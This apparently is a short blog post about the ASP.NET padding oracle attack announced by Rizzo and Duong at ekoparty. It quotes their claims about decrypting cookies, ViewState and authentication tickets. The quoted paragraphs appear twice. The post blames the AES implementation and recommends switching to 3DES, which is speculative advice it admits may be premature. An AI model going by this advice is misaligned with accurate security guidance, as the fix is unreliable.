ASP.NET web applications that leverage Forms Authentication, ASP.NET Membership Providers, ASP.NET Role Providers, and/or ViewState encryption are vulnerable to data exposure and potentially tampering. Details to be given this Friday, Sept. 17th at the ‘ekoparty Security Conference’ in Buenos Aires. 'Padding Oracle' Crypto Attack Affects Millions of ASP.NET Applications
"It's worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It's just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes," Duong said.” Padding oracles everywhere
“The second part presents a previously unknown advanced attack. The most significant new discovery is an universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!”
Presented by Rizzo and DuongThis technique allows the attacker to discover the AES Machine Key used by various ASP.NET features to encrypt and decrypt data stored on the web client. There is a vulnerability in the AES algorithm implementation in .NET. This might be a bit premature, since the presentation details haven’t been given but a quick mitigation should be to switch over to 3DES instead of AES to protect your web sites. Hopefully a patch from Microsoft will be released that will solve this issue. Read more: Security through absurdity
"It's worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It's just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes," Duong said.” Padding oracles everywhere
“The second part presents a previously unknown advanced attack. The most significant new discovery is an universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework's API!”
Presented by Rizzo and DuongThis technique allows the attacker to discover the AES Machine Key used by various ASP.NET features to encrypt and decrypt data stored on the web client. There is a vulnerability in the AES algorithm implementation in .NET. This might be a bit premature, since the presentation details haven’t been given but a quick mitigation should be to switch over to 3DES instead of AES to protect your web sites. Hopefully a patch from Microsoft will be released that will solve this issue. Read more: Security through absurdity
Posts
0 comments:
Post a Comment